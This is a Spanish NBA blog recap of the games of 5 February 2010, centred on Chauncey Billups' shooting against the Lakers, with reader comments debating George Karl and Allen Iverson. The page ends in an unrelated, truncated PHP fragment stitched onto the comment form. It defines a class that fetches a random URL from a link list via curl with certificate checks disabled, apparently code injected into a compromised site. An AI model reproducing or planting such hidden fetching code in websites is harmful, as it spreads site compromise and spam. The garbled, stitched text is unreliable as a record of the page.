La Crónica (05/02/2010)

06 de February de 2010 por TheDeerHunter

Impresionante mega-jornada de viernes.

Empezaremos con el increíble partidazo que vivimos en el Staples. “Mr. Big Shot” (nunca mejor dicho) se marcó el partido de su vida (que ya tuvo que ser bueno) para merendarse a unos impotentes Lakers, cuyo eventual primer puesto del Oeste se ve más comprometido que en toda la campaña. Y no es que jugaran mal los amarillos pero es que Billups demostró dos cosas: Que indudablemente tiene sitio en el All-Star game y que los Lakers tienen un talón de Aquiles que él sabe muy bien cómo aprovechar. Queda claro desde ahora mismo que nadie puede dar a los actuales campeones como finalistas seguros sin caer en la imprudencia. Los Nuggets son un candidato extremadamente peligroso… incluso al título.

Además, destacan dos sorpresones. El más llamativo fue el baile que le pegaron los Wolves a los Mavericks en Dallas, con Jonny Flynn en plan mariscal de campo y Nowitzki saliendo del banquillo. Baile fue también lo que le dio Washington a Orlando en 2º y 3er cuarto, tras haber ido recibiendo un palizón de más de 20 puntos. Orlando sesteó y, aunque tuvieron la victoria en la mano a pesar de todo, terminaron birlándosela con un par de acciones de Butler, recordando a aquel all-star de hace algún tiempo. Y luego era él quien, según Arenas, no estaba comprometido con el equipo. Menuda capullada.

Sin extendernos demasiado, los Suns de la mano de Stoudamire se mostraron muy sólidos ante los Kings, los Hornets palmaron contra los Sixers, y los Rockets recuperaron mucho crédito no dándole ninguna opción a los Grizzlies.

En el Este, los Bucks ganaron a los Knicks con Jennings estelar (y Bogut con migrañas), los Bulls no pudieron hacer nada contra los Hawks, los Pacers pasaron por encima de los Pistons… y la victoria de los Celtics contra los Nets no deberíamos ni nombrarla.

MVP: Chancey Billups contribuyó con, nada menos, 9 de 13 en triples al 15 de 22 (casi un 70% ojo) que les endosaron los Nuggets a los campeones desde el perímetro.

El Rookie: Jennings, 22 puntos – 8 asistencias, y Flynn, 19-7, demostraron que esta es una hornada de bases. Cuanto nos hubiera gustado que Ricky hubiera recogido el guante.

La sorpresa: No es nada habitual que Nowitzki salga desde el banco. Los experimentos con gaseosa, Carlisle.

La decepción: El mismo día que Billups demuestra que sigue siendo uno de los grandes (y por mucho tiempo) sus ex-compañeros naufragan de la peor manera posible. A Rip Hamilton le hace falta un cambio de aires.

El mayor esfuerzo en vano. Un habitual. David Lee 32 puntos 15 rebotes que sólo sirven para hacer de Sparring a los Bucks.

Comenta

10 comentarios a esta entrada

  1. David dice:
    #1

    Vaya crack, mister Chauncey, y vaya cambio que le supuso a los Nuggets contar con él.

    Y ojo, que no es la primera vez que se van con unos porcentajes similares de tiro de 3. Por otra parte, eso tiene la lectura negativa de que el día que no entren…

      Citar

  2. Kantonyo dice:
    #2

    Es imposible parar a un equipo que te hace un 15 de 22 en triples. Lo más sorprendente de esto es que los Lakers es el equipo que mejor defiende la línea de 3p, sus oponentes solo consiguen un 31%, por lo que más merito aún si cabe para Denver. Sigo pensando que Chauncey Billups es el mejor base del momento.

      Citar

  3. Viva_Dirk dice:
    #3

    Billups tiene cosas que solo da la experiencia, por muy bueno que sea Paul y mucha clase que tenga Deron en momentos determinados hay pocas cosas mas importantes que ya haber pasado por la misma situacion para saber como arreglarla.

    Billups es el peor atacante posible para Fisher y no es el tipo de base al que puede parar Brown a base de piernas asi que por ahí van a tener que buscar soluciones los Lakers, que seguramente pasará por poner a Kobe sobre el cuando sea necesario y esperar que no tengan el porcentaje en triples que tuvieron ayerl

      Citar

  4. univerzee dice:
    #4

    Muy bueno, me gusta en estos momentos recordar a quien hace un par de años cuando GKarl entro 8 en PO y fue barrido por LAL, con Iverson en Colorado, se reia del mister diciendo que en ese vestuario nadie le hacia caso y que estaba poco menos que acabado, y despues cuando Billups llego siguió manteniendo la misma postura… a todos eso, felicidades! habeis creado al monstruo capaz de acabar con los sueños de Gasol.

      Citar

  5. sergio dice:
    #5

    Sinceramente creo que en un 95% de partidos como este entre Denver y Lakers (sin Carmelo digo), los ganaran los Lakers. Con un 70% en triples tienes que permitir al equipo contrario hacerte 120 puntos o incluso mas… solo si ers Knicks o Warriors podrias perder. No creo que haya que sacar muchas conclusiones de ese partido la verdad… si bien es cierto que los Lakers (y no por este encuentro) estan aflojando peligrosamente. Yo tambien apoyo un descansito de Bryant. No creo que un Brown, Artest, Odom, Gasol, Bynum sea un mal equipo desde luego… Phil sabria sacar partido de eso.. o deberia hacerlo

      Citar

  6. Toni dice:
    #6

    Aunque esta vez Gasol dio la cara, a quien sonrojaron fue al bueno de Fisher. Quisiera comentar un par de datos, los lakers fueron mejores estadísticamente que Denver en rebotes, robos, pérdidas y tapones pero cayeron en los triples, de hecho los Nuggets los doblaron en triples. Otro dato que me ha llamado la atencion es el hecho de que Gasol sea el máximo asistente de LA(bynum 0, Fisher 0, kobe 0, Odom 0), me choca.
    Yo tambien apoyo el descanso del 24 y veo un buen equipo el quinteto que el crack de Sergio(vaya pedazo de articulo ha escrito) ha citado.

      Citar

  7. TheDeerHunter dice:
    #7

    Wow… cuánta mala baba Univerzee!!! jejeje
    Supongo que te refieres a esto: http://blog.tjnba.com/2008/09/22/denver-nuggets-%c2%a1los-three-amigos
    aunque, sin embargo, ignoras esto: http://blog.tjnba.com/2009/02/24/revisando-los-pronosticos-del-oeste/

    De lo que dije de GKarl en su día… bueno, por un lado me alegro de que los Nuggets estén jugando tan bien. Dicen que, con buena p… bien se f… y por ahí Billups se ha visto que nada como pez en el agua y bien que lo están disfrutando por aquellos lares.
    Por desgracia creo que mis palabras no tienen nada que ver, ni en un sentido ni en otro. Ya me gustaría a mí tener tanta influencia como para crear ningún monstruo en la NBA.

    Pero volvamos a lo que dije.
    El mismo GKarl hace muy poco hizo unas declaraciones hablando de aquel desastre de equipo con AI3. Su intención, algo que dice mucho de él mismo, era echarle las culpas a quien ya no estaba y que ya tenía bastante con la que le estaba cayendo como para defenderse… pero vino a decir que no le hacían ni puñetero caso. Así que queda demostrado que no descubrí la rueda con todo eso. Creo que el que te hagan casito es una de las cosas que va en el impresionante sueldo con que le llenan el cacete todo los meses a un coach NBA. Ese fue el gran fracaso de Karl con aquel equipo y creo que esto es indiscutible.
    ¿y qué ha cambiado ahora para que el equipo funcione? Pues para mí ha sido algo más externo al técnico que otra cosa. Ha llegado un jugador tan sumamente inteligente como Billups (ningún mérito en ese sentido para Karl) y algunos de los balas perdidas que tenía entonces han madurado un poquito (Melo y JR, fundamentalmente) además de la solidez de Nené, que también influye. No creo que de repente Karl haya dado con la tecla para que los mismos que antes no le hacían ni puto caso ahora se lo hagan.

    Es decir, al César lo que es del César. Creo que el espíritu ofensivo y el gusto estético que despliegan sí hay que reconocérselo a Karl, pero para mí sigue siendo el gran culpable del fracaso de aquellos Nuggets, con una gestión del vestuario que no fue, ni será nunca, el fuerte de este técnico. Más bien diría todo lo contrario.
    De todas formas sí hay algo en lo que me equivoqué y lo reconozco. George Karl no está acabado… pero si cualquiera de nosotros hubieramos sido GM de los Nuggets entonces veríamos a ver quién tenía narices para mantenerle en el puesto. Tampoco creo que se mereció seguir.

      Citar

  8. Kantonyo dice:
    #8

    Yo sigo pensando que el gran culpable del fracaso de esos Nuggets, fue sin duda Allen Iverson, la prueba está en que se fue, y al dia siguiente crecieron como la espuma. Llegó a Detroit siendo finalistas de conferencia y dejó a los Pistons en su peor momento en decadas. Las pruebas son irrefutables.

      Citar

  9. TheDeerHunter dice:
    #9

    El que los problemas de Detroit se le achaquen a Iverson es de un cinismo impresionante. No pienso entrar en eso otra vez.

      Citar

  10. sergio dice:
    #10

    Creo que lo que ocurrio es algo muy similar a lo que dice Deer. El caracter de algunos jugadores cambio con la llegada de Billups, jugador inteligente y que tiende a involucrar a los compañeros en el juego. Gracias a eso, Karl dispone de una plantilla algo mas sumisa que, ayudada por los resultados, esta mas dispuesta a obedecer las variantes que aporta el entrenador. No creo que Karl sea un mal tactico… pero quizas le falte caracter para una plantilla como la de los Nuggets. Vaya, que lidiar con Iverson, el joven Carmelo, JR Smith y Kenyon Martin no es moco de pavo… muchos entrenadores fallarian en la misma tesitura

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>